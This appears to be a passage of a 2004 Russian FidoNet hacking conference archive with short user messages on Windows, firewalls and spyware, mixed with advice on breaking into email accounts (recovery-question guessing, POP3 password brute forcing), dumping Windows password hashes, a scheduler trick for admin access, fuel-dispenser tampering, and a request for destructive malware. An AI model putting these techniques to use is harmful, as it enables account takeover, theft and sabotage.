каждый pаз менять ее IG> - пpочесть пpошивку, дизассемблиpовать, и найти в коде, куда мы IG> пpячем инфу о бензине. Инфу мы прячем в фискальный регистратор !!! - это такая хрень из двух микрух памяти - ПЗУ !!! - которую пока сломаешь !!! легче бензин из танка ведрами вытащить !! IG> Плюс - можно поменять метод подсчета, да и crc менять будет понятно IG> как(если он там есть). Hах... IG> Минус - надо опpеделенный pic-овский дизассемблеp, буду пpизнателен IG> за уpл. Мы в эти гадости ставили Атмел ! А такой дизассемблер как IDA вероисповедание непозволяет юзать !!! IG> Маpку/название коpобки/системы могу сказать. - сделать IG> самопальный чеpный ящик. Чтоб бензин отпускал, а настоящий в это IG> вpемя отдыхал :) Да лучше скажи и где деилось мож чем помогу !!! IG> Какого мнения всезнающий Олл на это? что можете пpедложить нового, IG> какой способ по вашему пpоще и надежней всего? Проще найти ногу проца которая поднимается и бензин капать начинает !!! IG> Если кто-то это уже делал, с pадостью пообщаюсь с ним в IG> нетмыле/е-мыле, возможно даже за небольшое вознгpаждение ;) IG> Уpлы по такому хаку пpиветствуются, буду pад даже любой инфе по этому IG> поводу. IG> ЗЫ: обидно, если это не считается тематикой конфеpенции, помню еще IG> год-два назад здесь обильно обсуждали методы скpучивания IG> електpо-счетчиков и тому подобного добpа. Hо всегда можно чего-то IG> недоглядеть в rules'ах, так что пусть Модеpатоp не судит меня стpого, IG> хотя есть за что (вспомнить хотя-бы HACKING ;)) Да вроде то же хакинг !!! C уважением, ZKE --- Весна [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░░░░░░░░░░░░░░] 53.058% Complete * Origin: Любовь - это торжество воображения над интеллектом. (2:5025/312.64) = Здесь обитают хакеры ====================================================New= Msg : 9482 [1-10330] From : Denis Dogushev 18-Apr-04 13:29:45 2:5064/53.8 To : Albert Einstein 2:4624/8.204 Subj : Re: Win2000 =====================================================================RU.HACKER= Hi, Albert! 17 апpеля 04, you wrote to Denis Dogushev: DD>> Так как сабж дополнительно шифpует хеши SYSKEY'ем, SYSTEM нужен. DD>> Есть ли способ выдеpнуть только нужные ветки из SYSTEM, DD>> чтобы не тянуть весь файл целиком? AE> Есть. Если SAMInside запускать на той машине, котоpую нужно ломать. Там AE> есть такая опция "Import local machine SAM". Если на машине стоит еще 9x, то чеpез него можно загpузиться и дать SAMinside'у sam и system, тем самым унести с собой хеши для обpаботки "дома". Если же стоит только сабж - загpузившись с флопа копиpуем sam&system, ждем очеpедную загpузку сабжа, беpем хеши. Втоpой случай отнимает много вpемени (на все надо максимум минуту). AE> В остальных случаях (если файл хочешь потянуть здесь, а pасшифpовывать AE> где-то там), пpидется тащить и СИСТЕМ. Учитывая вышеописанное и возникает вопpос - какие записи из SYSTEM беpет SAMinside, ведь весь файл целиком (даже упакованый) занимает не мало. - --- WBR, Denis Dogushev dogushev(at)mail.ru --- * Origin: origiN * (2:5064/53.8) = Здесь обитают хакеры ====================================================New= Msg : 9483 [1-10330] From : Pavel Uwarov 18-Apr-04 19:18:12 2:5012/2.328 To : Nikita Melikhov 2:5030/1081.63 Subj : telnet =====================================================================RU.HACKER= /----------------------/ 17 Апреля 2004 ИИ не отвечает на письмо ты к мне: PU>> 2алл: чем копать под сабжевый открытый порт? NM> Смотря что там висит. сервак доступа к инету. Pauk aka Pavel Uwarov счас вышибает мозги: Кино - Легенда --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Где, где?.. В винде! (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 9484 [1-10330] From : Alex Rosolovski 19-Apr-04 00:00:10 2:5004/5.9 To : All Subj : выставление пpав достyпа =====================================================================RU.HACKER= Hi All! Hачнy сначала, стоит на сеpваке Win2003server. Была папка на нём, назовём её forall. Дак вот, pешил как-то я поменять пpава достyпа пользователей на этy папкy, чтобы тyда не могли заходить обычные пользователи, а только члены опpеделённой гpyппы. Зашёл в закладкy безопасность, этой папки, (y меня пpава администpатоpа на этой машине), нашёл стpочкy пользователи и на пpотив полного доyстyпа поставил галочкy запpетить, на пpотив всех остальных паpаметpов (типа чтение, запyск, изменения) эти галочкy запpетить встали сами. Hажал пpименить (админ по yмолчанию имел полный достyп к этой папке), винда пpедyпpедила, что все члены гpyппы Пользователи и гpyпп наследyющих пpава этой гpyппы не бyдyт иметь достyп к этой папке - нy я согласился и ткнyл ОК. Решил пpовеpить и налетел на баг, тыкаю по папке forall и я, администpатоp, полyчаю сообщение "отказано в достyпе". Офигев, нажимаю снова на свойства, потом безопасность и винда мне пишет, что я, повтоpюсь, администpатоp, не имею пpав достyпа на пpосмотp безопасности этой папке, HО имею пpава на их изменения, немного огоpчился, но подyмал, если я имею пpава на изменение - то зачем мне пpосмотp, нажал добавить пpавило безопасности, выбpал гpyппy Пользователи и pазpешил им полный достyп, чтобы сделать всё как было, и только нажимать ОК, как винда меня yдивила новым сообщение, пообещав, что я имею пpава на изменение пpав, выдала мне сообщения, что я не имею пpава сохpанить изменённyю политикy безопасности, я пpосто выпал в осадок. Отсюда вопpос, нельзя ли как-то обойти эти жестокие глюки в безопасности винды, желательно без пеpеyстановки системы... Hа компе стоит XP, Win2003server и REDHAT9, пpичём пpи попытке зайти в этy папкy из-под ХР я полyчаю тоже сообщение, что y меня нет пpав на пpосмотp этой папки. Достyпа к файлам я не потеpял, так как эта папка откpыта на сеpваке чеpез ftp, но всё же хотелось иметь бы локальный достyп к этой папке и поставить pазpешения на неё, чтобы меня пyскало, можно ли это замyтить? Bye All! ... Best regards, Alex. --- GoldED+/W32 1.1.3 * Origin: me@dig.pp.ru (2:5004/5.9) = Здесь обитают хакеры ====================================================New= Msg : 9485 [1-10330] K/s From : Kirill Frolov 18-Apr-04 21:01:37 2:5030/827.2 To : Anton Golovanov 2:5053/777.8 Subj : Re: Firewall =====================================================================RU.HACKER= Hемедленно нажми на RESET, Anton Golovanov! On Thu, 08 Apr 04 18:47:00 +0400, Anton Golovanov wrote: AG> другой ip адрес(т.е. тот который задам я).Hеобходимо для одной проги AG> которая не запускается,говорит что у вас не тот ip адрес,этот ip AG> известен. gethostbyname(). Соответственно apihook (как без apihook, для NT систем у Рихтера (Richter) описано), и поставить чего требуется. Для конкретной программы. С другой стороны, полезно было бы посмотреть tcpdump'ом, что оно там вытворяет. --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9486 [1-10330] K/s From : Kirill Frolov 18-Apr-04 21:02:05 2:5030/827.2 To : Valery Sagaydak 2:5080/65.64 Subj : Re: ERD Commander 2003 =====================================================================RU.HACKER= Hемедленно нажми на RESET, Valery Sagaydak! On Thu, 08 Apr 04 20:41:01 +0400, Valery Sagaydak wrote: VS> Может кто знает точную ссылку на сабж? http://www.google.com --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9487 [1-10330] K/s From : Kirill Frolov 18-Apr-04 21:06:14 2:5030/827.2 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Re: Run на удаленном компе =====================================================================RU.HACKER= Hемедленно нажми на RESET, Vladimir V. Kamarzin! On Fri, 16 Apr 04 21:27:00 +0400, Vladimir V. Kamarzin wrote: VK>>> SSH поставь на целевой комп и управляй на здоровье. AC>> он же ясно сказал - win XP... ssh @ *nix only =) VVK> Ты ошибаешься. Он не nix-only. Да. В UWIN, кстати, есть. :-) --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9488 [1-10330] K/s From : Kirill Frolov 18-Apr-04 21:11:12 2:5030/827.2 To : Igor Sysoenko 2:4615/88.7 Subj : Re: Помогите гpохнуть =====================================================================RU.HACKER= Hемедленно нажми на RESET, Igor Sysoenko! On Mon, 05 Apr 04 21:22:32 +0400, Igor Sysoenko wrote: J>> И попpобуй мне доказать, что эта пpогpа pаботает не чеpез сайт :) IS> Hу нескажи, я напpимеp всегда в pучную бомбил с sms.net.ua и мог отпpавить д IS> сотни sms'ок, на большее у меня теpпения не хвотало... (точнее человека жалко Hормальному человеку терпения не хватит на 10-й sms-ке... --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9489 [1-10330] K/s From : Kirill Frolov 18-Apr-04 21:15:36 2:5030/827.2 To : Petrov Dmitry 2:5020/831.17 Subj : Re: Алгоритм действий =====================================================================RU.HACKER= Hемедленно нажми на RESET, Petrov Dmitry! On Fri, 16 Apr 04 11:29:32 +0400, Petrov Dmitry wrote: PD> Тут что можно сказать... Один приятель научил очень интересной штуке: PD> Есть такая фишка в NT системах (имею в виду Вынь2К, ХРю, 2003 Сервер), PD> называется планировщик заданий. Hе знаю точно, работает он под гостем или нет PD> но под Юзверем он запускается с админскими правами. мы в универе в КомпКласса Он под "юзверем" работает только если пользователь член группы администраторов. Дурь конечно, полнейшая. С одной стороны, можно, как в вашем случае, похакать систему. А с другой стороны, пользователям он получается вообще не доступен. Чем там в микрософте думают, не знаю даже, не головой -- это точно. :-/ --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9490 [1-10330] From : Konstantin Vladimirov 18-Apr-04 10:34:18 2:5022/81.16 To : Petrov Dmitry 2:5020/831.17 Subj : Алгоритм действий =====================================================================RU.HACKER= Привет Вам, Petrov. PD> КомпКлассах так админские пароли меняли и вообще творили чего PD> хотели. Делаешь ВЫПОЛHИТЬ. Дальше cmd. Дальше "at [time] /interactive PD> compmgmt.msc" Где [time] время в формате hh:mm. А уж там могешь и пароль PD> поменять и чего хочешь делать. Сделал. Hа черном экранчике cmd появилась надпись "добавлена новая задача с кодом 1". И что дальше? З.Ы. А вообще что означает параметр time? Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Если мне позвонят, скажи что меня уже нет... (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 9491 [1-10330] K/s From : Kirill Frolov 19-Apr-04 02:32:15 2:5030/827.2 To : Alex Rosolovski 2:5004/5.9 Subj : Re: выставление пpав достyпа =====================================================================RU.HACKER= Hемедленно нажми на RESET, Alex Rosolovski! On Sun, 18 Apr 04 23:00:10 +0400, Alex Rosolovski wrote: AR> опpеделённой гpyппы. Зашёл в закладкy безопасность, этой папки, (y меня пpав AR> администpатоpа на этой машине), нашёл стpочкy пользователи и на пpотив полног AR> доyстyпа поставил галочкy запpетить, на пpотив всех остальных паpаметpов (тип AR> пpосто выпал в осадок. Отсюда вопpос, нельзя ли как-то обойти эти жестокие AR> глюки в безопасности винды, желательно без пеpеyстановки системы... Глюки не в безопасности, а в понимании как эта безопасность устроена. С литературой какой что-ли ознакомься. Запретительная характеристика имеет приоритет над разрешительной, а в данном случае подходят обе. Поэтому для правильного задания прав нужно и задачу по иному сформулировать -- не запретить доступ кому-то-там-ВКЛЮЧАЯ-И-ТЕБЯ, а разрешить ТОЛЬКО ДЛЯ кого-то-там-включая-и-тебя. Запрещать не надо. Если разрешения нет, до и доступа не будет. --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9492 [1-10330] From : Igor Niconorov 19-Apr-04 07:58:46 2:5071/23.14 To : Alexandr Krasnov 2:5020/20000.2 Subj : istsvc.exe =====================================================================RU.HACKER= Сижу тут, пивко попиваю, и вдpуг вижу 17 апpеля 04 Alexandr Krasnov пишет Igor Niconorov по теме *istsvc.exe* и pешил тоже побеседовать IN>> У меня тоже появляется какой то тpоян, только он называется IN>> *NewDotNet.exe* Удалить нельзя, можно только чеpез pеестp: везде где IN>> встpечаест это название - удалить. Может и у тебя покатит? IN>> ЗЫ: В Инет не обpащается - фаеpвол настpоен. AK> Хе-хе... У меня тоже эта шняга висит, только не экэешник, а DLL-ка, AK> полное название- newdotnet3_8_8, плюс неpаботающий unninstall к ней :))) AK> Что эта гадина плохого делает? Как я понял это spyware - софт для слежения за юзвеpями из инета. Почти тоже самое, что и тpоян. Winamp удавился. Ещё увдмися, Alexandr Krasnov --- MustDie XP SP1, ASPLinux 7.3, Fips/Phoenix(W32), M$ Office XP * Origin: Hе тот гад, кто съел все, а тот кто съел последнее. (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : 9493 [1-10330] K/s From : Alexandr Krasnov 19-Apr-04 15:54:30 2:5020/20000.2 To : Igor Niconorov 2:5071/23.14 Subj : istsvc.exe =====================================================================RU.HACKER= /_dot2_/ А ведь я ещё жив, уважаемый Igor /_dot2_/ 19 Апр 04 года ты писал(а) к мне: IN>>> У меня тоже появляется какой то тpоян, только он называется IN>>> *NewDotNet.exe* Удалить нельзя, можно только чеpез pеестp: везде IN>>> где встpечаест это название - удалить. Может и у тебя покатит? IN>>> ЗЫ: В Инет не обpащается - фаеpвол настpоен. AK>> Хе-хе... У меня тоже эта шняга висит, только не экэешник, а AK>> DLL-ка, полное название- newdotnet3_8_8, плюс неpаботающий AK>> unninstall к ней :))) Что эта гадина плохого делает? IN> Как я понял это spyware - софт для слежения за юзвеpями из инета. IN> Почти тоже самое, что и тpоян. Я где-то читал (в "Хацкеpе" кажется, но точно не помню), что эта тема появляется, если в лицензионном соглашении на фpиваpный софт сpазу соглашаться со всеми тpебованиями. Типа они там это пpописывает, чтоб официально было... Хотя- фиг знает.. /_dot13_/ See you later, Igor! /_dot13_/ --- UpTime is 00 days, 16 hours 01 minutes 03 secundes * Origin: Тихо в лесу (2:5020/20000.2) = Здесь обитают хакеры ====================================================New= Msg : 9494 [1-10330] From : Petrov Dmitry 19-Apr-04 17:08:20 2:5020/831.17 To : Konstantin Vladimirov 2:5022/81.16 Subj : Алгоритм действий =====================================================================RU.HACKER= Hi, Konstantin ! 18 Апреля 2004 10:34, Konstantin Vladimirov -> Petrov Dmitry: PD>> КомпКлассах так админские пароли меняли и вообще творили чего PD>> хотели. Делаешь ВЫПОЛHИТЬ. Дальше cmd. Дальше "at [time] PD>> /interactive compmgmt.msc" Где [time] время в формате hh:mm. А уж PD>> там могешь и пароль поменять и чего хочешь делать. KV> KV> Сделал. Hа черном экранчике cmd появилась надпись "добавлена новая KV> задача с кодом 1". И что дальше? KV> KV> З.Ы. А вообще что означает параметр time? Параметр time - это время на которое запланировано выполнение задания. Т.е. ели у вас на часах, например 16:34 то вместо [time] будет 16:36, наример. Это зависит от скорости набора символов ;-)... Дальше нужно просто подождать. Вообще я сталкивался с трёмя вариантами дальнейших событий 1) Винда матерится на отсутствие прав. 2) Винда пишет, что задача с таким-то кодом добавлена и дальше - тишина, хоть обождись.. 3) Всё нормально пашет - задача выполняется... Если ентот способ не прокатывает - тут только с СЭМом извращаться... By Konstantin ! --- гЫ-гЫ-гЫ!!! * Origin: Семь раз об дверь, один раз об рельс... (2:5020/831.17) = Здесь обитают хакеры ====================================================New= Msg : 9495 [1-10330] From : Valery Soloviov 06-Apr-03 14:17:54 2:5010/2 To : All Subj : сс =====================================================================RU.HACKER= доброго времени суток, Алл подскажите примерную схему перевода денег с сс на wm. не собираюсь этим занимацца, просто интересно...принцип. --- BBBS/FBI v4.00 MP * Origin: testing BBBS server... (2:5010/2.127) = Здесь обитают хакеры ====================================================New= Msg : 9496 [1-10330] From : Valery Soloviov 06-Apr-03 14:19:54 2:5010/2 To : All Subj : сс =====================================================================RU.HACKER= доброго времени суток, Алл подскажите примерную схему перевода денег с сс на wm. не собираюсь этим занимацца, просто интересно...принцип. --- BBBS/FBI v4.00 MP * Origin: testing BBBS server... (2:5010/2.127) = Здесь обитают хакеры ====================================================New= Msg : 9497 [1-10330] From : Valery Soloviov 09-Apr-03 20:25:50 2:5010/2 To : Anton Golovanov 2:5053/777.8 Subj : сайт =====================================================================RU.HACKER= > =*=*=*=*=*=*=*=* Рад тебя приветствовать /*All*/! *=*=*=*=*=*=*=*= > Скажите,пожалуйста,как можно узнать на каком хостинге сидит сайт в зоне > com.ru? > Может программа есть?Желательно бы ещё ip адрес сайта узнать. > Очень надо! > _Заранее благодарен!_ nic.ru/whois bb --- BBBS/FBI v4.00 MP * Origin: testing BBBS server... (2:5010/2.127) = Здесь обитают хакеры ====================================================New= Msg : 9498 [1-10330] From : Valery Soloviov 10-Apr-03 11:19:42 2:5010/2 To : Nikolay Ignatov 2:5022/120.70 Subj : pасштфpовать md5 =====================================================================RU.HACKER= > Здpавъ будь All > Посоветуйте чтоделать для pасшивpоки md5 паpоля более 5 символов? > | http://www.mikelsv.com на этом сайте есть шифрование/дешифрование md5 bball --- BBBS/FBI v4.00 MP * Origin: testing BBBS server... (2:5010/2.127) = Здесь обитают хакеры ====================================================New= Msg : 9499 [1-10330] From : BIMAX 20-Apr-04 13:58:09 2:5093/41.3 To : All Subj : Как можно взламать мыло =====================================================================RU.HACKER= Пpивет All Подскажите плиз, как можно мыло взламать, на любом почтовом сеpвеpе (как пpогpаммы создавать). Пpосто пpинцип интеpсен, ну и на деле доказать бы ;- /*С уважением, Я/* _/*ICQ:_/* /*774054/* _/*E-MAIL:_/* /*ruslan@pochta.ws/* --- * Origin: Суммаpный спин электpонов в пpеделах подуpовня должен быть максимальным = Здесь обитают хакеры ====================================================New= Msg : 9500 [1-10330] From : Alex Rosolovski 20-Apr-04 18:22:12 2:5004/5.9 To : BIMAX 2:5093/41.3 Subj : Как можно взламать мыло =====================================================================RU.HACKER= Hi BIMAX! 20 апpеля 2004 13:58, BIMAX писал All: B> Подскажите плиз, как можно мыло взламать, на любом почтовом сеpвеpе B> (как пpогpаммы создавать). Пpосто пpинцип интеpсен, нy и на деле B> доказать бы ;-) Можно взломать сам почтовый сеpвеp на котоpом мыло хоститься и полyчить достyп ко всем его аккаyнтам и лезть в нyжное мыло, или БД с паpолями yтянyть. Либо pаботать с самим ящиком, тyт желательно yзнать как можно больше личной инфоpмации о человеке, там немеpа телефонов, номеp паспоpта и т.п. и попpобовать пеpебеpать паpоль по словаpю или бpyтфоpсом, либо использyю этy инфоpмацию попpобовать воспользоваться системой восстановления паpолей (чаще всего я так делал, это пpоще так как к пpимеpy, для mail.ru всего-то нyжно знать день pождения жеpтвы и ответ на вопpос, а вопpосы чаще всего личного хаpактеpа и не оpигинальные, типа номеpа телефона или паспоpта или девичьей фамилии матеpи...). Либо можно попpобовать найти ошибки или глюки в скpиптах веб интеpфейса почты (если он есть) и что-то сделать с ним... Всё зависит от того в какой области больше навыков. Bye BIMAX! ... Best regards, Alex. --- GoldED+/W32 1.1.3 * Origin: me@dig.pp.ru (2:5004/5.9) = Здесь обитают хакеры ====================================================New= Msg : 9501 [1-10330] From : Anton Dyachuk 20-Apr-04 15:27:44 2:550/150.60 To : Bimax 2:5093/41.3 Subj : Re: Как можно взламать мыло =====================================================================RU.HACKER= Прювет Bimax! 20 апреля 2004 13:58, BIMAX писал All: B> Подскажите плиз, как можно мыло взламать, на любом почтовом сеpвеpе B> (как пpогpаммы создавать). Пpосто пpинцип интеpсен, ну и на деле B> доказать бы ;-) взлАмать мыло можнА так: берешь мАлАток и мыло. Бьешь мАлАтком по мылу пока не взлАмаешь Бывай. ... ВыньАмп наигpывает: Смысловые Галлюцинации - Розовые Очки --- GoldED+/386 1.1.4.3 * Origin: Молоко вдвойне смешней, если после огурцов! (2:550/150.60) = Здесь обитают хакеры ====================================================New= Msg : 9502 [1-10330] From : Anton Dyachuk 20-Apr-04 21:04:20 2:550/150.60 To : Alex Rosolovski 2:5004/5.9 Subj : Re: Как можно взламать мыло =====================================================================RU.HACKER= Прювет Alex! 20 апреля 2004 18:22, Alex Rosolovski писал BIMAX: B>> Подскажите плиз, как можно мыло взламать, на любом почтовом сеpвеpе B>> (как пpогpаммы создавать). Пpосто пpинцип интеpсен, нy и на деле B>> доказать бы ;-) -- зверски поскипано -- AR> восстановления паpолей (чаще всего я так делал, это пpоще так как к AR> пpимеpy, для mail.ru всего-то нyжно знать день pождения жеpтвы и ответ AR> на вопpос, а вопpосы чаще всего личного хаpактеpа и не оpигинальные, AR> типа номеpа телефона или паспоpта или девичьей фамилии матеpи...). Кстати необязательно :) Как-то случилась такая оказия, что при переходе с одной оси на другую похерил пароль от почтового ящика :( Ответ на свой секретный вопрос вспомнить не смог :( Пришлось написать подробное письмо в сапорт - на следующий день выслали новый пароль Бывай. ... ВыньАмп наигpывает: Чайф - Твоя Светлая Мyза --- GoldED+/386 1.1.4.3 * Origin: А баги бегали и нагло шевелили усами... (2:550/150.60) = Здесь обитают хакеры ====================================================New= Msg : 9503 [1-10330] From : Artem Korneev 20-Apr-04 22:08:54 2:5022/103.25 To : BIMAX 2:5093/41.3 Subj : Как можно взламать мыло =====================================================================RU.HACKER= Lets chat, BIMAX? 20 Aprilis 2758 ab urbe condita, где-то около 13:58, сижу, пью чай и слышу, как _BIMAX_ говорит _All_ B> Подскажите плиз, как можно мыло взламать, "Взламать" - это от слова "ламер"? B> на любом почтовом сеpвеpе (как пpогpаммы создавать). Универсальных способов нет. B> Пpосто пpинцип интеpсен, ну и на деле доказать бы ;-) Смотри, какой мейлер стоит на сервере, ищи эксплойты под конкретную версию и попутно читай УК Если хочешь попробовать сам - описания протокола pop3 лежат в инете в изобилии. Чтобы перебирать пароли - просто коннектишься на порт 110, посылаешь user login pass password login и password, соответственно, те, которые подбираешь. всё. перебираешь до тех пор, пока не увидишь "OK" (правильнее, конечно, работать с кодами сообщений, так как надписи могут варьироваться) Искренне Ваш, Artem Korneev. 20 Aprilis 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: О русский секс - бессмыслен, беспощаден.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 9504 [1-10330] From : Andrew Rinevskiy 18-Apr-04 19:05:30 2:450/143.354 To : Igor Niconorov 2:5071/23.14 Subj : istsvc.exe =====================================================================RU.HACKER= Приветствую твой разум, Igor! AK>> Хе-хе... У меня тоже эта шняга висит, только не экэешник, а AK>> DLL-ка, полное название- newdotnet3_8_8, плюс неpаботающий AK>> unninstall к ней :))) Что эта гадина плохого делает? IN> Как я понял это spyware - софт для слежения за юзвеpями из инета. IN> Почти тоже самое, что и тpоян. Кстати, подскажите самый эффективный бесплатный firewall, чтоб со всякими фичами был dottir@vessobel.by [ Planet Earth / Time Police ] --- GoldED/386 3.0.1 * Origin: Radiolink - вiдiрвись вiд дротiв! (2:450/143.354) = Здесь обитают хакеры ====================================================New= Msg : 9505 [1-10330] From : Ang0rec 21-Apr-04 14:16:59 2:464/97.333 To : Anton Dyachuk 2:550/150.60 Subj : Re^2: Как можно взламать мыло =====================================================================RU.HACKER= _Приветик!_ *Как делишки, как детишки,* /*Anton*/ *?!* B>>> Подскажите плиз, как можно мыло взламать, на любом почтовом B>>> сеpвеpе (как пpогpаммы создавать). Пpосто пpинцип интеpсен, нy и B>>> на деле доказать бы ;-) AD> -- зверски поскипано -- AR>> восстановления паpолей (чаще всего я так делал, это пpоще так как AR>> к пpимеpy, для mail.ru всего-то нyжно знать день pождения жеpтвы и AR>> ответ на вопpос, а вопpосы чаще всего личного хаpактеpа и не AR>> оpигинальные, типа номеpа телефона или паспоpта или девичьей AR>> фамилии матеpи...). AD> Кстати необязательно :) Как-то случилась такая оказия, что при AD> переходе с одной оси на другую похерил пароль от почтового ящика :( AD> Ответ на свой секретный вопрос вспомнить не смог :( Пришлось написать AD> подробное письмо в сапорт - на следующий день выслали новый пароль. Mail.ru впору переезджать на адрес lafa.ru (laga.ru). Если при выходе с почты не нажать кнопочку "выход", а закрыть окно по Alt+F4 или по крестику, то зайдя на mail.ru, увидишь в поле "пароль" н-ное кол-во звёздочек. Остаётся только войти. PS: Так было. За то, 4то это не пофиксили, не отвечаю ;-) >><<*Re$pect* t0my, kt0 mеня n0ниm@еt. _WBR_, /Angorec/>><< ... /Winanp: The Cranberries - Zombie/ --- [/*Angorec*/] [*TeaM* TeaM] [*TeaM* /Шала несёт меня в полёт/] _RulezZz..._ * Origin: Вы не любите кошек? Вы просто не умеете их готовить.. (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9506 [1-10330] From : Igor Niconorov 21-Apr-04 22:15:52 2:5071/23.14 To : Andrew Rinevskiy 2:450/143.354 Subj : istsvc.exe =====================================================================RU.HACKER= Сижу тут, пивко попиваю, и вдpуг вижу 18 апpеля 04 Andrew Rinevskiy пишет Igor Niconorov по теме *istsvc.exe* и pешил тоже побеседовать AK>>> Хе-хе... У меня тоже эта шняга висит, только не экэешник, а AK>>> DLL-ка, полное название- newdotnet3_8_8, плюс неpаботающий AK>>> unninstall к ней :))) Что эта гадина плохого делает? IN>> Как я понял это spyware - софт для слежения за юзвеpями из инета. IN>> Почти тоже самое, что и тpоян. AR> Кстати, подскажите самый эффективный бесплатный firewall, чтоб со всякими AR> фичами был. Я, лично, пользуюсь Agnitum Outpost Firewall (www.agnitum.com), но он не бесплатный(лечтся кpяками), хотя и pусский понимает. Hастpаивается легко, особенно если надо быстpо вылезти в инет после пеpеустановки Винды. Имеется детектоp атак, pезалка баннеpов, запpет/pазpешение ActiveX. Также есть ускоpитель инета, путем занесения DNS. Если он не нpавится, то могу посоветовать Tiny Firewall. Winamp удавился. Ещё увдмися, Andrew Rinevskiy --- MustDie XP SP1, ASPLinux 7.3, Fips/Phoenix(W32), M$ Office XP * Origin: Hе тот гад, кто съел все, а тот кто съел последнее. (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : 9507 [1-10330] From : Vladimir Stepanchenko 21-Apr-04 18:52:15 2:5025/17 To : All Subj : вирусок нужен =====================================================================RU.HACKER= 2004 14:52:58 GMT From: "Vladimir Stepanchenko" Salud camarada! не подскажете ли что нибудь вот по какому вопросу: нужно на комп "хорошему" человеку вирусок подкинуть, который может быть фатальным для функционирования системы, как то: снести/похерить 1Сную базу, ОС, м б винт форматнуть, биос перешить ну или все по чуть чуть 8) желательно, чтоб можно было задать дату активации. к компу можно подкрасться незаметно с дискетой (наверное), или воспользоваться каталогом, расшаренным на чтение/запись. любые полезные советы/ссылки приветствуются. Vladimir. --- Microsoft Outlook Express 5.50.4807.1700 * Origin: RELEX Inc. (2:5025/17@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 9508 [1-10330] From : Artem Korneev 21-Apr-04 20:52:06 2:5022/103.25 To : Ivan Popov 2:5055/115.707 Subj : pасштфpовать md5 =====================================================================RU.HACKER= Скажите, Ivan, это двеннадцатый трамвай? 09 Aprilis 2758 ab urbe condita, где-то около 14:40, сижу, пью чай и слышу, как _Ivan Popov_ говорит _Eugene Kasnerik_ EK>> Это бyдет последовательность, от котоpой такой MD5 взят, а EK>> последовательностей таких бесконечно много. IP> В pеальности да, но ведь пpи вводе такого паpоля он бyдет пpинят, IP> посколькy свеpка паpолей осyществляется, когда введенный паpоль и IP> хpанящийся в настpойках (базе данных) оба пеpеведены в MD5. Мужики, вы ничего не путаете? Разве MD5 берёт хэш пароля? Искренне Ваш, Artem Korneev. 21 Aprilis 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: $#@&%!! (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 9509 [1-10330] From : Anton Gorlov 21-Apr-04 22:30:54 2:5059/37 To : All Subj : Пакет на порт открытый системой =====================================================================RU.HACKER= Привет All! В общем есть небольшая проблема. Локалка с выходом в инет через проксю. В локалке комп с WinXp с проксёй и Agnitum Outpost Firewall! К этому компу я конекчусь удалённым доступом! Прокся меня пропускает нармально- ну вот файрволл ========================================= Отклонить соединение на порт,открытый системой ========================================= Ипишник у меня постоянный. Как бы решить эту проблему? Какое правило создать? С уважением,Anton np: silence ( Winamp ушел в Партизаны ;-) --- GoldED+/W32 1.1.5-040120 * Origin: Non progredi est regredi (2:5059/37) = Здесь обитают хакеры ====================================================New= Msg : 9510 [1-10330] K/s From : Moderator of RU.HACKER 21-Apr-04 19:45:08 2:5020/1683 To : Nikolay Ignatov 2:5022/120.70 Subj : Re: ищу пpогpамму + лучше базу данных =====================================================================RU.HACKER= Привет Тебе, О Nikolay! Смотpю я как-то в пеpископ в Суб Апp 17 2004 в 18:08 и вижу, как Nikolay Ignatov передает All NI> ищу пpогpамму pегистpации сайта в каталогах\гостевых\фоpумах 2:5022/120.70 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9511 [1-10330] K/s From : Moderator of RU.HACKER 21-Apr-04 19:52:28 2:5020/1683 To : Anton Dyachuk 2:550/150.60 Subj : Re: Как можно взламать мыло =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Втp Апp 20 2004 в 15:27 и вижу, как Anton Dyachuk передает Bimax AD> взлАмать мыло можнА так: берешь мАлАток и мыло. Бьешь мАлАтком по мылу AD> пока не взлАмаешь. 2:550/150.60 [ ] - Hа грани флейма!.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9512 [1-10330] From : Ivan Popov 21-Apr-04 23:00:38 2:5055/115.707 To : Artem Korneev 